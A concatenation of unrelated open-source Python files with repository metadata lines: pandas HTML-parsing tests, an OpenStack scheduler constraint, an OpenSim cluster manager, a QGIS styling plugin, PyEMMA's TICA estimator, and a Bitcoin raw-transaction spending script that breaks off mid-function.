"date": raw_dates.map(lambda x: str(x.date())),
"time": raw_dates.map(lambda x: str(x.time())),
}
)
res = self.read_html(
df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1
)
newdf = DataFrame({"datetime": raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_wikipedia_states_table(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
assert os.path.isfile(data), f"{repr(data)} is not a file"
assert os.path.getsize(data), f"{repr(data)} is an empty file"
result = self.read_html(data, match="Arizona", header=1)[0]
assert result.shape == (60, 12)
assert "Unnamed" in result.columns[-1]
assert result["sq mi"].dtype == np.dtype("float64")
assert np.allclose(result.loc[0, "sq mi"], 665384.04)
def test_wikipedia_states_multiindex(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
result = self.read_html(data, match="Arizona", index_col=0)[0]
assert result.shape == (60, 11)
assert "Unnamed" in result.columns[-1][1]
assert result.columns.nlevels == 2
assert np.allclose(result.loc["Alaska", ("Total area[2]", "sq mi")], 665384.04)
def test_parser_error_on_empty_header_row(self):
msg = (
r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns"
)
with pytest.raises(ParserError, match=msg):
self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""",
header=[0, 1],
)
def test_decimal_rows(self):
# GH 12907
result = self.read_html(
"""<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>""",
decimal="#",
)[0]
expected = DataFrame(data={"Header": 1100.101}, index=[0])
assert result["Header"].dtype == np.dtype("float64")
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
msg = re.escape(
"Passing a bool to header is invalid. Use header=None for no header or "
"header=int or list-like of ints to specify the row(s) making up the "
"column names"
)
for arg in [True, False]:
with pytest.raises(TypeError, match=msg):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={"a": str},
)[0]
expected = DataFrame({"a": ["0.763", "0.244"]})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244],
)[0]
expected = DataFrame({"a": [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({"a": ["N/A", "NA"]})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({"a": [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
"""
)[0]
expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(
data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")]
)
expected_df.columns = [
["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"],
]
html = expected_df.to_html(index=False)
html_df = self.read_html(html)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath("io", "data", "html", "banklist.html")
self.read_html(banklist_data, match=".*Water.*", flavor=["lxml", "html5lib"])
def test_to_html_timestamp(self):
rng = date_range("2000-01-01", periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert "2000-01-01" in result
@pytest.mark.parametrize(
"displayed_only,exp0,exp1",
[
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])),
],
)
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO(
"""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>"""
)
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
def test_encode(self, html_encoding_file):
base_path = os.path.basename(html_encoding_file)
root = os.path.splitext(base_path)[0]
_, encoding = root.split("_")
try:
with open(html_encoding_file, "rb") as fobj:
from_string = self.read_html(
fobj.read(), encoding=encoding, index_col=0
).pop()
with open(html_encoding_file, "rb") as fobj:
from_file_like = self.read_html(
BytesIO(fobj.read()), encoding=encoding, index_col=0
).pop()
from_filename = self.read_html(
html_encoding_file, encoding=encoding, index_col=0
).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if "16" in encoding or "32" in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get("flavor") == "lxml":
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO(
"""
<table><tr><td>spam<foobr />eggs</td></tr></table>"""
)
assert self.read_html(bad)
with pytest.raises(ValueError, match="passed a non-rewindable file object"):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile:
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = "" if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>")
bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>")
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super().run()
except Exception as err:
self.err = err
else:
self.err = None
# force import check by reinitalising global vars in html.py
reload(pandas.io.html)
filename = datapath("io", "data", "html", "valid_markup.html")
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
def test_parse_path_object(self, datapath):
# GH 37705
file_path_string = datapath("io", "data", "html", "spam.html")
file_path = Path(file_path_string)
df1 = self.read_html(file_path_string)[0]
df2 = self.read_html(file_path)[0]
tm.assert_frame_equal(df1, df2)
| datapythonista/pandas | pandas/tests/io/test_html.py | Python | bsd-3-clause | 40,117 | 0.000773 |
# Copyright (c) 2014 Cisco Systems Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.scheduler.solvers import constraints
CONF = cfg.CONF
CONF.import_opt("max_instances_per_host",
"nova.scheduler.filters.num_instances_filter")
LOG = logging.getLogger(__name__)
class NumInstancesConstraint(constraints.BaseLinearConstraint):
"""Constraint that specifies the maximum number of instances that
each host can launch.
"""
def _generate_components(self, variables, hosts, filter_properties):
num_hosts = len(hosts)
num_instances = filter_properties.get('num_instances')
var_matrix = variables.host_instance_matrix
max_instances = CONF.max_instances_per_host
for i in xrange(num_hosts):
num_host_instances = hosts[i].num_instances
acceptable_num_instances = int(max_instances - num_host_instances)
if acceptable_num_instances < 0:
acceptable_num_instances = 0
if acceptable_num_instances < num_instances:
for j in xrange(acceptable_num_instances, num_instances):
self.variables.append([var_matrix[i][j]])
self.coefficients.append([1])
self.constants.append(0)
self.operators.append('==')
LOG.debug(_("%(host)s can accept %(num)s requested instances "
"according to NumInstancesConstraint."),
{'host': hosts[i],
'num': acceptable_num_instances})
| CiscoSystems/nova-solver-scheduler | nova/scheduler/solvers/constraints/num_instances_constraint.py | Python | apache-2.0 | 2,244 | 0.001337 |
class Cluster:
"""
a cluster has N simulators
"""
def __init__(self,region_pool):
self.region_pool = region_pool
self.filepath = CLUSTER_DATA_DIR+"cluster"
# simulator list
self.simulator_list = []
def get_simulator_list(self):
return self.simulator_list
def get_simulator_count(self):
return len(self.simulator_list)
def add_simulator(self,sim):
self.simulator_list.append(sim)
def remove_simulator(self,sim):
self.simulator_list.remove(sim)
#====================================================================================
# get region name list
#====================================================================================
def __get_region_name_list(self,region_group,global_region_data):
#REGION_NAME_HUYU=["huyu"+str(x)+str(y) for x in range(4) for y in range(7)]
wh = global_region_data[region_group]["wh"]
xmax = wh[0]
ymax = wh[1]
region_name_list = ["{0}{1}{2}".format(region_group,x,y) for x in range(xmax) for y in range(ymax)]
return region_name_list
#====================================================================================
# init cluster
#====================================================================================
def init_cluster(self):
if os.path.exists(self.filepath):
print "[Cluster] read cluster data from {0}...".format(self.filepath)
self.__read_cluster_data(self.filepath)
else:
print "[Cluster] create default cluster for the first time..."
self.__create_default_cluster()
print "[Cluster] save cluster data to {0}...".format(self.filepath)
self.__save_cluster_data(self.filepath)
def __new_simulator_name(self):
sim_count = len(self.simulator_list)
if sim_count >= SIM_MAX_COUNT:
print "[Warning] sim_count >={0}".format(SIM_MAX_COUNT)
return "default"
return "sim{0}".format(sim_count+1)
def __new_simulator_port(self):
sim_count = len(self.simulator_list)
if sim_count >= SIM_MAX_COUNT:
print "[Warning] sim_count >={0}".format(SIM_MAX_COUNT)
return SIM_START_PORT
return SIM_START_PORT+(sim_count+1)
#====================================================================================
# create default cluster
#====================================================================================
def __create_default_cluster(self):
self.simulator_list = []
region_pool = self.region_pool
global_region_data = self.region_pool.get_global_region_data()
# huyu
region_group="huyu"
sim_name = self.__new_simulator_name()
sim_port = self.__new_simulator_port()
region_name_list = self.__get_region_name_list(region_group,global_region_data)
huyu_sim = Simulator(sim_name,sim_port,region_pool,region_name_list)
# create xml file
huyu_sim.create_simulator_xml_file()
self.add_simulator(huyu_sim)
# xwd
region_group="xwd"
sim_name = self.__new_simulator_name()
sim_port = self.__new_simulator_port()
region_name_list = self.__get_region_name_list(region_group,global_region_data)
xwd_sim = Simulator(sim_name,sim_port,region_pool,region_name_list)
# create xml file
xwd_sim.create_simulator_xml_file()
self.add_simulator(xwd_sim)
# newregion
region_group="newregion"
sim_name = self.__new_simulator_name()
sim_port = self.__new_simulator_port()
#region_name_list = self.__get_region_name_list("newregion",global_region_data)
region_name_list = self.__get_region_name_list(region_group,global_region_data)
#region_name_list = ["newregion00","newregion01"]
new_sim = Simulator(sim_name,sim_port,region_pool,region_name_list)
# create xml file
new_sim.create_simulator_xml_file()
self.add_simulator(new_sim)
print huyu_sim.get_region_port_list()
print xwd_sim.get_region_port_list()
print new_sim.get_region_port_list()
# copy xml files to minions
cmd = UtilityCommander()
cmd.copy_region_xml_to_minions(MINIONS)
def __save_cluster_data(self,filepath):
with open(filepath,'w') as f:
for sim in self.simulator_list:
line = sim.str()+"\n"
f.write(line)
def __read_cluster_data(self,filepath):
for line in open(filepath,'r'):
sim = self.__read_simulator(line)
self.add_simulator(sim)
#====================================================================================
# read simulator from simulator string
#====================================================================================
def __read_simulator(self,simulator_str):
parts = simulator_str.rstrip("\n").split(",")
sim_name = parts[0]
sim_port = int(parts[1])
region_name_list = parts[2:]
# create simulator
sim = Simulator(sim_name,sim_port,self.region_pool,region_name_list)
return sim
def start(self):
for sim in self.get_simulator_list():
sim_pod = OpensimPod(sim)
#sim_pod.start()
def stop(self):
for sim in self.get_simulator_list():
sim_pod = OpensimPod(sim)
sim_pod.stop()
| justasabc/kubernetes-ubuntu | ke/images/python/backup/backup_cluster.py | Python | apache-2.0 | 4,855 | 0.036663 |
'''
Created on 22 sept. 2015
@author: arxit
'''
import os
from qgis.core import *
from PyQt4.QtCore import QCoreApplication
import PagLuxembourg.main
class StylizeProject(object):
'''
Main class for the layers stylize widget
'''
def __init__(self):
'''
Constructor
'''
pass
def run(self):
'''
Runs the widget
'''
project = PagLuxembourg.main.current_project
if not project.isPagProject():
return
# Map layers in the TOC
maplayers = QgsMapLayerRegistry.instance().mapLayers()
# Iterates through XSD types
for type in PagLuxembourg.main.xsd_schema.types:
if type.geometry_type is None:
continue
uri = project.getTypeUri(type)
found = False
# Check whether a layer with type data source exists in the map
for k,v in maplayers.iteritems():
if project.compareURIs(v.source(), uri):
found = True
layer = v
break
if not found:
continue
self.stylizeLayer(layer, type)
PagLuxembourg.main.qgis_interface.messageBar().pushSuccess(QCoreApplication.translate('StylizeProject','Success'),
QCoreApplication.translate('StylizeProject','The layers styling is finished.'))
def stylizeLayer(self, layer, type):
'''
Stylize the current layer
:param layer: The layer to update
:type layer: QgsVectorLayer
:param type: XSD schema type
:type type: PAGType
'''
qml = os.path.join(PagLuxembourg.main.plugin_dir,
'styles',
'{}.qml'.format(type.name))
layer.loadNamedStyle(qml) | Geoportail-Luxembourg/qgis-pag-plugin | widgets/stylize/stylize.py | Python | mit | 2,046 | 0.012219 |
# This file is part of PyEMMA.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# PyEMMA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
Created on 19.01.2015
@author: marscher
'''
import numpy as np
from pyemma._base.serialization.serialization import SerializableMixIn
from pyemma._ext.variational.solvers.direct import eig_corr
from pyemma._ext.variational.util import ZeroRankError
from pyemma.coordinates.estimation.covariance import LaggedCovariance
from pyemma.coordinates.transform._tica_base import TICABase, TICAModelBase
from pyemma.util.annotators import fix_docs
import warnings
__all__ = ['TICA']
@fix_docs
class TICA(TICABase, SerializableMixIn):
r""" Time-lagged independent component analysis (TICA)"""
__serialize_version = 0
def __init__(self, lag, dim=-1, var_cutoff=0.95, kinetic_map=True, commute_map=False, epsilon=1e-6,
stride=1, skip=0, reversible=True, weights=None, ncov_max=float('inf')):
r""" Time-lagged independent component analysis (TICA) [1]_, [2]_, [3]_.
Parameters
----------
lag : int
lag time
dim : int, optional, default -1
Maximum number of significant independent components to use to reduce dimension of input data. -1 means
all numerically available dimensions (see epsilon) will be used unless reduced by var_cutoff.
Setting dim to a positive value is exclusive with var_cutoff.
var_cutoff : float in the range [0,1], optional, default 0.95
Determines the number of output dimensions by including dimensions until their cumulative kinetic variance
exceeds the fraction subspace_variance. var_cutoff=1.0 means all numerically available dimensions
(see epsilon) will be used, unless set by dim. Setting var_cutoff smaller than 1.0 is exclusive with dim
kinetic_map : bool, optional, default True
Eigenvectors will be scaled by eigenvalues. As a result, Euclidean distances in the transformed data
approximate kinetic distances [4]_. This is a good choice when the data is further processed by clustering.
commute_map : bool, optional, default False
Eigenvector_i will be scaled by sqrt(timescale_i / 2). As a result, Euclidean distances in the transformed
data will approximate commute distances [5]_.
epsilon : float
eigenvalue norm cutoff. Eigenvalues of C0 with norms <= epsilon will be
cut off. The remaining number of eigenvalues define the size
of the output.
stride: int, optional, default = 1
Use only every stride-th time step. By default, every time step is used.
skip : int, default=0
skip the first initial n frames per trajectory.
reversible: bool, default=True
symmetrize correlation matrices C_0, C_{\tau}.
weights: object or list of ndarrays, optional, default = None
* An object that allows to compute re-weighting factors to estimate equilibrium means and correlations from
off-equilibrium data. The only requirement is that weights possesses a method weights(X), that accepts a
trajectory X (np.ndarray(T, n)) and returns a vector of re-weighting factors (np.ndarray(T,)).
* A list of ndarrays (ndim=1) specifies the weights for each frame of each trajectory.
Notes
-----
Given a sequence of multivariate data :math:`X_t`, computes the mean-free
covariance and time-lagged covariance matrix:
.. math::
C_0 &= (X_t - \mu)^T (X_t - \mu) \\
C_{\tau} &= (X_t - \mu)^T (X_{t + \tau} - \mu)
and solves the eigenvalue problem
.. math:: C_{\tau} r_i = C_0 \lambda_i(tau) r_i,
where :math:`r_i` are the independent components and :math:`\lambda_i(tau)` are
their respective normalized time-autocorrelations. The eigenvalues are
related to the relaxation timescale by
.. math:: t_i(tau) = -\tau / \ln |\lambda_i|.
When used as a dimension reduction method, the input data is projected
onto the dominant independent components.
References
----------
.. [1] Perez-Hernandez G, F Paul, T Giorgino, G De Fabritiis and F Noe. 2013.
Identification of slow molecular order parameters for Markov model construction
J. Chem. Phys. 139, 015102. doi:10.1063/1.4811489
.. [2] Schwantes C, V S Pande. 2013.
Improvements in Markov State Model Construction Reveal Many Non-Native Interactions in the Folding of NTL9
J. Chem. Theory. Comput. 9, 2000-2009. doi:10.1021/ct300878a
.. [3] L. Molgedey and H. G. Schuster. 1994.
Separation of a mixture of independent signals using time delayed correlations
Phys. Rev. Lett. 72, 3634.
.. [4] Noe, F. and Clementi, C. 2015. Kinetic distance and kinetic maps from molecular dynamics simulation.
J. Chem. Theory. Comput. doi:10.1021/acs.jctc.5b00553
.. [5] Noe, F., Banisch, R., Clementi, C. 2016. Commute maps: separating slowly-mixing molecular configurations
for kinetic modeling. J. Chem. Theory. Comput. doi:10.1021/acs.jctc.6b00762
"""
super(TICA, self).__init__()
if kinetic_map and commute_map:
raise ValueError('Trying to use both kinetic_map and commute_map. Use either or.')
if (kinetic_map or commute_map) and not reversible:
kinetic_map = False
commute_map = False
warnings.warn("Cannot use kinetic_map or commute_map for non-reversible processes, both will be set to"
"False.")
# this instance will be set by partial fit.
self._covar = None
self.dim = dim
self.var_cutoff = var_cutoff
self.set_params(lag=lag, dim=dim, var_cutoff=var_cutoff, kinetic_map=kinetic_map, commute_map=commute_map,
epsilon=epsilon, reversible=reversible, stride=stride, skip=skip, weights=weights, ncov_max=ncov_max)
@property
def model(self):
if not hasattr(self, '_model') or self._model is None:
self._model = TICAModelBase()
return self._model
def describe(self):
try:
dim = self.dimension()
except RuntimeError:
dim = self.dim
return "[TICA, lag = %i; max. output dim. = %i]" % (self._lag, dim)
def estimate(self, X, **kwargs):
r"""
Chunk-based parameterization of TICA. Iterates over all data and estimates
the mean, covariance and time lagged covariance. Finally, the
generalized eigenvalue problem is solved to determine
the independent components.
"""
return super(TICA, self).estimate(X, **kwargs)
def partial_fit(self, X):
""" incrementally update the covariances and mean.
Parameters
----------
X: array, list of arrays, PyEMMA reader
input data.
Notes
-----
The projection matrix is first being calculated upon its first access.
"""
from pyemma.coordinates import source
iterable = source(X, chunksize=self.chunksize)
indim = iterable.dimension()
if not self.dim <= indim:
raise RuntimeError("requested more output dimensions (%i) than dimension"
" of input data (%i)" % (self.dim, indim))
if self._covar is None:
self._covar = LaggedCovariance(c00=True, c0t=True, ctt=False, remove_data_mean=True, reversible=self.reversible,
lag=self.lag, bessel=False, stride=self.stride, skip=self.skip,
weights=self.weights, ncov_max=self.ncov_max)
self._covar.partial_fit(iterable)
self.model.update_model_params(mean=self._covar.mean, # TODO: inefficient, fixme
cov=self._covar.C00_,
cov_tau=self._covar.C0t_)
self._estimated = False
return self
def _estimate(self, iterable, **kw):
covar = LaggedCovariance(c00=True, c0t=True, ctt=False, remove_data_mean=True, reversible=self.reversible,
lag=self.lag, bessel=False, stride=self.stride, skip=self.skip,
weights=self.weights, ncov_max=self.ncov_max)
indim = iterable.dimension()
if not self.dim <= indim:
raise RuntimeError("requested more output dimensions (%i) than dimension"
" of input data (%i)" % (self.dim, indim))
if self._logger_is_active(self._loglevel_DEBUG):
self.logger.debug("Running TICA with tau=%i; Estimating two covariance matrices"
" with dimension (%i, %i)", self._lag, indim, indim)
covar.estimate(iterable, chunksize=self.chunksize, **kw)
self.model.update_model_params(mean=covar.mean,
cov=covar.C00_,
cov_tau=covar.C0t_)
self._diagonalize()
return self.model
def _diagonalize(self):
# diagonalize with low rank approximation
self.logger.debug("diagonalize Cov and Cov_tau.")
try:
eigenvalues, eigenvectors = eig_corr(self.cov, self.cov_tau, self.epsilon, sign_maxelement=True)
except ZeroRankError:
raise ZeroRankError('All input features are constant in all time steps. No dimension would be left after dimension reduction.')
if self.kinetic_map and self.commute_map:
raise ValueError('Trying to use both kinetic_map and commute_map. Use either or.')
if self.kinetic_map: # scale by eigenvalues
eigenvectors *= eigenvalues[None, :]
if self.commute_map: # scale by (regularized) timescales
timescales = 1-self.lag / np.log(np.abs(eigenvalues))
# dampen timescales smaller than the lag time, as in section 2.5 of ref. [5]
regularized_timescales = 0.5 * timescales * np.maximum(np.tanh(np.pi * ((timescales - self.lag) / self.lag) + 1), 0)
eigenvectors *= np.sqrt(regularized_timescales / 2)
self.logger.debug("finished diagonalisation.")
# compute cumulative variance
cumvar = np.cumsum(np.abs(eigenvalues) ** 2)
cumvar /= cumvar[-1]
self.model.update_model_params(cumvar=cumvar,
eigenvalues=eigenvalues,
eigenvectors=eigenvectors)
self._estimated = True
| markovmodel/PyEMMA | pyemma/coordinates/transform/tica.py | Python | lgpl-3.0 | 11,423 | 0.004465 |
#!/usr/bin/env python
#
# Use the raw transactions API to spend bitcoins received on particular addresses,
# and send any change back to that same address.
#
# Example usage:
# spendfrom.py # Lists available funds
# spendfrom.py --from=ADDRESS --to=ADDRESS --amount=11.00
#
# Assumes it will talk to a bitcoind or Bitcoin-Qt running
# on localhost.
#
# Depends on jsonrpc
#
from decimal import *
import getpass
import math
import os
import os.path
import platform
import sys
import time
from jsonrpc import ServiceProxy, json
BASE_FEE=Decimal("0.001")
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def determine_db_dir():
"""Return the default location of the bitcoin data directory"""
if platform.system() == "Darwin":
return os.path.expanduser("~/Library/Application Support/Bitcoin/")
elif platform.system() == "Windows":
return os.path.join(os.environ['APPDATA'], "Bitcoin")
return os.path.expanduser("~/.bitcoin")
def read_bitcoin_config(dbdir):
"""Read the bitcoin.conf file from dbdir, returns dictionary of settings"""
from ConfigParser import SafeConfigParser
class FakeSecHead(object):
def __init__(self, fp):
self.fp = fp
self.sechead = '[all]\n'
def readline(self):
if self.sechead:
try: return self.sechead
finally: self.sechead = None
else:
s = self.fp.readline()
if s.find('#') != -1:
s = s[0:s.find('#')].strip() +"\n"
return s
config_parser = SafeConfigParser()
config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, "bitcoin.conf"))))
return dict(config_parser.items("all"))
def connect_JSON(config):
"""Connect to a bitcoin JSON-RPC server"""
testnet = config.get('testnet', '0')
testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False
if not 'rpcport' in config:
config['rpcport'] = 19230 if testnet else 9230
connect = "http://%s:%s@127.0.0.1:%s"%(config['rpcuser'], config['rpcpassword'], config['rpcport'])
try:
result = ServiceProxy(connect)
# ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors,
# but also make sure the bitcoind we're talking to is/isn't testnet:
if result.getmininginfo()['testnet'] != testnet:
sys.stderr.write("RPC server at "+connect+" testnet setting mismatch\n")
sys.exit(1)
return result
except:
sys.stderr.write("Error connecting to RPC server at "+connect+"\n")
sys.exit(1)
def unlock_wallet(bitcoind):
info = bitcoind.getinfo()
if 'unlocked_until' not in info:
return True # wallet is not encrypted
t = int(info['unlocked_until'])
if t <= time.time():
try:
passphrase = getpass.getpass("Wallet is locked; enter passphrase: ")
bitcoind.walletpassphrase(passphrase, 5)
except:
sys.stderr.write("Wrong passphrase\n")
info = bitcoind.getinfo()
return int(info['unlocked_until']) > time.time()
def list_available(bitcoind):
address_summary = dict()
address_to_account = dict()
for info in bitcoind.listreceivedbyaddress(0):
address_to_account[info["address"]] = info["account"]
unspent = bitcoind.listunspent(0)
for output in unspent:
# listunspent doesn't give addresses, so:
rawtx = bitcoind.getrawtransaction(output['txid'], 1)
vout = rawtx["vout"][output['vout']]
pk = vout["scriptPubKey"]
# This code only deals with ordinary pay-to-bitcoin-address
# or pay-to-script-hash outputs right now; anything exotic is ignored.
if pk["type"] != "pubkeyhash" and pk["type"] != "scripthash":
continue
address = pk["addresses"][0]
if address in address_summary:
address_summary[address]["total"] += vout["value"]
address_summary[address]["outputs"].append(output)
else:
address_summary[address] = {
"total" : vout["value"],
"outputs" : [output],
"account" : address_to_account.get(address, "")
}
return address_summary
def select_coins(needed, inputs):
# Feel free to improve this, this is good enough for my simple needs:
outputs = []
have = Decimal("0.0")
n = 0
while have < needed and n < len(inputs):
outputs.append({ "txid":inputs[n]["txid"], "vout":inputs[n]["vout"]})
have += inputs[n]["amount"]
n += 1
return (outputs, have-needed)
def create_tx(bitcoind, fromaddresses, toaddress, amount, fee):
all_coins = list_available(bitcoind)
total_available = Decimal("0.0")
needed = amount+fee
potential_inputs = []
for addr in fromaddresses:
if addr not in all_coins:
continue
potential_inputs.extend(all_coins[addr]["outputs"])
total_available += all_coins[addr]["total"]
if total_available < needed:
sys.stderr.write("Error, only %f BTC available, need %f\n"%(total_available, needed));
sys.exit(1)
#
# Note:
# Python's json/jsonrpc modules have inconsistent support for Decimal numbers.
# Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode
# Decimals, I'm casting amounts to float before sending them to bitcoind.
#
outputs = { toaddress : float(amount) }
(inputs, change_amount) = select_coins(needed, potential_inputs)
if change_amount > BASE_FEE: # don't bother with zero or tiny change
change_address = fromaddresses[-1]
if change_address in outputs:
outputs[change_address] += float(change_amount)
else:
outputs[change_address] = float(change_amount)
rawtx = bitcoind.createrawtransaction(inputs, outputs)
signed_rawtx = bitcoind.signrawtransaction(rawtx)
if not signed_rawtx["complete"]:
sys.stderr.write("signrawtransaction failed\n")
sys.exit(1)
txdata = signed_rawtx["hex"]
return txdata
def compute_amount_in(bitcoind, txinfo):
result = Decimal("0.0")
for vin in txinfo['vin']:
in_info = bitcoind.getrawtransaction(vin['txid'], 1)
vout = in_info['vout'][vin['vout']]
result = result + vout['value']
return result
def compute_amount_out(txinfo):
result = Decimal("0.0")
for vout in txinfo['vout']:
result = result + vout['value']
return result
def sanity_test_fee(bitcoind, txdata_hex, max_fee):
class FeeError(RuntimeError):
pass
try:
txinfo = bitcoind.decoderawtransaction(txdata_hex)
total_in = compute_amount_in(bitcoind, txinfo)
total_out = compute_amount_out(txinfo)
if total_in-total_out > max_fee:
raise FeeError("Rejecting transaction, unreasonable fee of "+str(total_in-total_out))
tx_size = len(txdata_hex)/2
kb = tx_size/1000 # integer division rounds down
if kb > 1 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee transaction, larger than 1000 bytes")
if total_in < 0.01 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee, tiny-amount transaction")
# Exercise for the reader: compute transaction priority, and
# warn if this is a very-low-priority transaction
except FeeError as err:
sys.stderr.write((str(err)+"\n"))
sys.exit(1)
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--from", dest="fromaddresses", default=None,
help="addresses to get bitcoins from")
parser.add_option("--to", dest="to", default=None,
help="address to get send bitcoins to")
parser.add_option("--amount", dest="amount", default=None,
help="amount to send")
parser.add_option("--fee", dest="fee", default="0.0",
help="fee to include")
parser.add_option("--datadir", dest="datadir", default=determine_db_dir(),
help="location of bitcoin.conf file with RPC username/password (default: %default)")
parser.add_option("--testnet", dest="testnet", default=False, action="store_true",
help="Use the test network")
parser.add_option("--dry_run", dest="dry_run", default=False, action="store_true",
help="Don't broadcast the transaction, just create and print the transaction data")
(options, args) = parser.parse_args()
check_json_precision()
config = read_bitcoin_config(options.datadir)
if options.testnet: config['testnet'] = True
bitcoind = connect_JSON(config)
if options.amount is None:
address_summary = list_available(bitcoind)
for address,info in address_summary.iteritems():
n_transactions = len(info['outputs'])
if n_transactions > 1:
print("%s %.8f %s (%d transactions)"%(address, info['total'], info['account'], n_transactions))
else:
